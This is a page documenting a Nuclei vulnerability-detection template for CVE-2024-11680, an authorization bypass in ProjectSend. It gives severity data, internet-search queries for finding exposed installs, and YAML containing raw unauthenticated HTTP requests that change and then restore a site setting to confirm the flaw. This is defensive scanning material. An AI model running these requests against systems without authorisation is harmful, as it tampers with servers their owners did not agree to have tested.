ProjectSend <= r1605 - Improper Authorization
ID: CVE-2024-11680
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2024,projectsend,auth-bypass,intrusive,kev
Description
Section titled “Description”An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application.
YAML Source
Section titled “YAML Source”id: CVE-2024-11680
info: name: ProjectSend <= r1605 - Improper Authorization author: DhiyaneshDK severity: critical description: | An improper authorization check was identified within ProjectSend version r1605 that allows an attacker to perform sensitive actions such as enabling user registration and auto validation, or adding new entries in the whitelist of allowed extensions for uploaded files. Ultimately, this allows to execute arbitrary PHP code on the server hosting the application. reference: - https://www.projectsend.org/ - https://www.synacktiv.com/sites/default/files/2024-07/synacktiv-projectsend-multiple-vulnerabilities.pdf - https://vulncheck.com/advisories/projectsend-bypass classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-11680 cwe-id: CWE-287,CWE-863 epss-score: 0.46821 epss-percentile: 0.97618 cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: projectsend product: projectsend shodan-query: - http.html:"projectsend" - http.html:"projectsend setup" - http.html:"provided by projectsend" fofa-query: - body="projectsend" - body="projectsend setup" - body=provided by projectsend google-query: intext:provided by projectsend tags: cve,cve2024,projectsend,auth-bypass,intrusive,kevvariables: string: "{{randstr}}"
flow: http(1) && http(2) && http(3) && http(4) && http(5)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "projectsend")' condition: and internal: true
extractors: - type: regex name: csrf group: 1 regex: - 'name="csrf_token" value="([0-9a-z]+)"' internal: true
- type: regex name: title group: 1 regex: - '<title>Log in » ([0-9a-zA-Z]+)<\/title>' internal: true
- raw: - | POST /options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}§ion=general&this_install_title={{string}}
matchers: - type: dsl dsl: - 'status_code == 500' - 'contains(content_type, "text/html")' condition: and internal: true
- raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "{{string}}")' condition: and internal: true
- raw: - | POST /options.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
csrf_token={{csrf}}§ion=general&this_install_title={{title}}
matchers: - type: dsl dsl: - 'status_code == 500' - 'contains(content_type, "text/html")' condition: and internal: true
- raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "{{title}}")' condition: and# digest: 490a00463044022069e33d6bf9c7e823ca82d568cf32ce5078da4ebe9869fab89ec5b16ff6ff1c1e02207dcab84f6280bfaabe123a066786187df522eecfe7ad7d2796d8955eb8b30fa4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-11680.yaml"